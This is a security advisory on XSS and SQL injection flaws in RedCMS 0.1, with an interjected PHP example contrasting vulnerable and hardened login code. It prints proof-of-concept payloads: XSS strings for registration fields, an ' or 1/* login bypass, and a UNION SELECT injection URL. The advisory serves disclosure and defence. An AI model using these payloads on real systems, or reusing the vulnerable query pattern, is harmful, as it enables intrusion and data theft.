Multiple XSS and SQL Injection in RedCMS

Summary

Vulnerability: Multiple XSS and SQL Injection in RedCMS
Discovered: 2006.03.30
Last Update: 2006.04.09 Exploitation code published
ID: EV0115
CVE: CVE-2006-1568 CVE-2006-1569
Risk Level: medium
Type: Multiple Vulnerabilities
Status: Unpatched. No reply from developer(s)
Vendor: n/a
Vulnerable Software: RedCMS (http://redcms.co.uk/)
Version: 0.1
PoC/Exploit: Available
Solution: Not available
Discovered by: Aliaksandr Hartsuyeu (eVuln.com)

Description

Multiple vulnerabilities were found in the RedCMS (http://redcms.co.uk/) script.

1. Multiple Cross-Site Scripting Vulnerabilities.

Vulnerable script: register.php

The email, location and website parameters are not properly sanitized. This can be used to post arbitrary HTML or web script code.

2. Multiple SQL Injections.

Vulnerable scripts:
login.php
profile.php
register.php
...

The variables $username (login.php), $password (login.php), $u (profile.php), $username (register.php), $password (register.php), ... are not properly sanitized before being used in SQL queries; this applies to all user-supplied variables. This can be used to bypass authentication or to run arbitrary SQL queries by injecting SQL code.

Condition: magic_quotes_gpc = off
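As an added illustration, not code from RedCMS or from this advisory, the PHP below puts the unsafe pattern the advisory describes (user input concatenated into a query, protected only by magic_quotes_gpc) next to a hardened login using a prepared statement, plus the output encoding that neutralises the register.php XSS. The users table, its columns and the function names are assumptions made for the example.

```php
<?php
// Added example, not RedCMS code. Table and column names are assumed.

// Unsafe pattern: request values are concatenated straight into the SQL text.
// With magic_quotes_gpc = off, a username of  ' or 1/*  turns the WHERE clause
// into  username='' or 1/* ...  so the query matches every row and the first
// account is returned without a valid password.
function login_vulnerable(mysqli $db, string $username, string $password): ?array
{
    $sql = "SELECT id, username FROM users WHERE username='$username' "
         . "AND password='$password'";
    $res = $db->query($sql);
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// Hardened pattern: a prepared statement keeps the input out of the query text,
// so quote characters cannot change the query structure regardless of the
// magic_quotes_gpc setting. The password is checked against a stored hash
// instead of being compared in SQL.
function login_hardened(mysqli $db, string $username, string $password): ?array
{
    $stmt = $db->prepare(
        'SELECT id, username, password_hash FROM users WHERE username = ?'
    );
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    if ($row === null || !password_verify($password, $row['password_hash'])) {
        return null;
    }
    unset($row['password_hash']);
    return $row;
}

// For the XSS in register.php: encode user-supplied profile values at the point
// where they are rendered into HTML, so a value such as  aaa'>[XSS]<aaa aaa='
// is shown as literal text instead of being parsed as markup.
function render_profile_field(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
```

Input validation on the registration form (length limits, an e-mail format check) is a useful second layer, but the encoding at render time is what actually prevents the injected markup from executing.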

PoC/Exploit

1. Cross-Site Scripting Example.

URL: http://[host]/redcms/register.php

Email: aaa'>[XSS]<aaa aaa=';

Location: aaa'>[XSS]<aaa aaa=';

Website: aaa'>[XSS]<aaa aaa=';

2. SQL Injection Examples.

URL: http://[host]/redcms/login.php

Username: ' or 1/*

Password: any

URL: http://[host]/redcms/profile.php?id=99'%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,161,7,18,19,20/*

Solution.

A solution for "Multiple XSS and SQL Injection in RedCMS" is not available. Check the vendor's website for updates.